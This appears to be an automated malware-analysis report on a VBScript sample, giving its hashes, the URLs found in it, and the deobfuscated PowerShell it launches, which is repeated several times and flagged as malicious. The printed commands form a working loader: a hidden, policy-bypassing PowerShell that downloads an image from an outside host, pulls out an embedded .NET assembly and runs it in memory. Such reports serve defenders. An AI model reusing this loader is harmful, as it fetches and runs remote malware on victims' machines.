d244a98d96cdc337dff5d8eec36016d2
VBScript | MD5: d244a98d96cdc337dff5d8eec36016d2 | Size: 62.65 KB | text/vbscript
|
Hash | Hash Value |
|---|---|
| MD5 | d244a98d96cdc337dff5d8eec36016d2
|
| Sha1 | fb786c5270273fd7792f6550d07d0b9df0c512e3
|
| Sha256 | d25591f0627f988edceb12fdadef30e4a856b1fa016f10043cdf2379ac234b2c
|
| Sha384 | 99b8a746711db8076aea7c35121675e7c5f9ae32ba7b5bd0046cf024ea760f64e0c5b2f65ecf6bb9ba6c01b6025a24d2
|
| Sha512 | 31394a14255c38120eff5af99db5115a7a445349b83505231a70fb05b98d46fa25031535bfb0facb1970699b6312f03718ae2ac18e88ce3e6b6a0f4a1fc43920
|
| SSDeep | 384:6Kws5K6qn28Cas1wGWpD52wQBfvHjeNwkJEecawVf7CtMN1r2QewpJNHQWpEcawM:nYZBVLv1vflXpMhiUH3nq
|
| TLSH | 1153BAB456151F02B4911A722B41B9CC4F36F23289CC2B2A5BCF6FC666E4F5CEC5391A
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://www.javascriptfreecode.com |
| URLs in VB Code - #2 | https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css |
| URLs in VB Code - #3 | https://fonts.googleapis.com |
| URLs in VB Code - #4 | https://fonts.gstatic.com |
| URLs in VB Code - #5 | https://fonts.googleapis.com/css2?family=Inter:wght@400 |
| URLs in VB Code - #6 | https://api.javascripttutorial.net/v1/quotes/?limit= |
| Deobfuscated PowerShell | powershell -w "hidden" -noprofile -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" |
| Deobfuscated PowerShell | powershell -w "hidden" -noprofile -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" |
| Deobfuscated PowerShell | -w "hidden" -noprofile -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" |
| Deobfuscated PowerShell | $null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/msi-pro/MSI_PRO.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHducWahJWZtVWbl12bj9yMzEjLzQjMuUzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "InstallUtil", "", "", "", "", "C:\Users\Public\Downloads", "whitlow", "", "", "", "gonno", "2", "") } )) |
| Deobfuscated PowerShell | -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" |
| Deobfuscated PowerShell | -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://www.javascriptfreecode.com |
d244a98d96cdc337dff5d8eec36016d2 |
| URLs in VB Code - #2 | https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css |
d244a98d96cdc337dff5d8eec36016d2 |
| URLs in VB Code - #3 | https://fonts.googleapis.com |
d244a98d96cdc337dff5d8eec36016d2 |
| URLs in VB Code - #4 | https://fonts.gstatic.com |
d244a98d96cdc337dff5d8eec36016d2 |
| URLs in VB Code - #5 | https://fonts.googleapis.com/css2?family=Inter:wght@400 |
d244a98d96cdc337dff5d8eec36016d2 |
| URLs in VB Code - #6 | https://api.javascripttutorial.net/v1/quotes/?limit= |
d244a98d96cdc337dff5d8eec36016d2 |
| Deobfuscated PowerShell | powershell -w "hidden" -noprofile -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" Malicious |
d244a98d96cdc337dff5d8eec36016d2 > d244a98d96cdc337dff5d8eec36016d2.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | powershell -w "hidden" -noprofile -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" Malicious |
d244a98d96cdc337dff5d8eec36016d2 > d244a98d96cdc337dff5d8eec36016d2.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | -w "hidden" -noprofile -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" Malicious |
d244a98d96cdc337dff5d8eec36016d2 > d244a98d96cdc337dff5d8eec36016d2.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/msi-pro/MSI_PRO.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "0hHducWahJWZtVWbl12bj9yMzEjLzQjMuUzNx4yNwEzLvoDc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "InstallUtil", "", "", "", "", "C:\Users\Public\Downloads", "whitlow", "", "", "", "gonno", "2", "") } )) Malicious |
d244a98d96cdc337dff5d8eec36016d2 > d244a98d96cdc337dff5d8eec36016d2.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" Malicious |
d244a98d96cdc337dff5d8eec36016d2 > d244a98d96cdc337dff5d8eec36016d2.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | -ep "bypass" -c "$daisterre='JG51bGwgPSAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKChJbnZva2UtV2ViUmVxdWVzdCAnaHR0cHM6Ly9hcmNoaXZlLm9yZy9kb3dubG9hZC9tc2ktcHJvL01TSV9QUk8uanBnJyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50KSAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7JHZhbG9yID0gJG1hdGNoZXNbMV07JGFzc2VtYmx5ID0gW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdmFsb3IpKTskb2xpbmlhID0gJzBoSGR1Y1dhaEpXWn58VldibDEyYmo5eU16RWpMelFqTXVVek54NHlOd0V6THZvRGMwUkhhJy5SZXBsYWNlKCd+fCcsJ3QnKTskdHlwZSA9ICRhc3NlbWJseS5HZXRUeXBlKCdDbGFzc0xpYnJhcnkxLkhvbWUnKTskbWV0aG9kID0gJHR5cGUuR2V0TWV0aG9kKCdWQUknKTskbWV0aG9kLkludm9rZSgkbnVsbCwgW29iamVjdFtdXUAoJG9saW5pYSwnJywnJywnJywnSW5zdGFsbFV0aWwnLCcnLCcnLCcnLCcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnd2hpdGxvdycsJycsJycsJycsJ2dvbm5vJywnMicsJycpKTs=';$consumeless=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($daisterre));Invoke-Expression $consumeless" Malicious |
d244a98d96cdc337dff5d8eec36016d2 > d244a98d96cdc337dff5d8eec36016d2.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |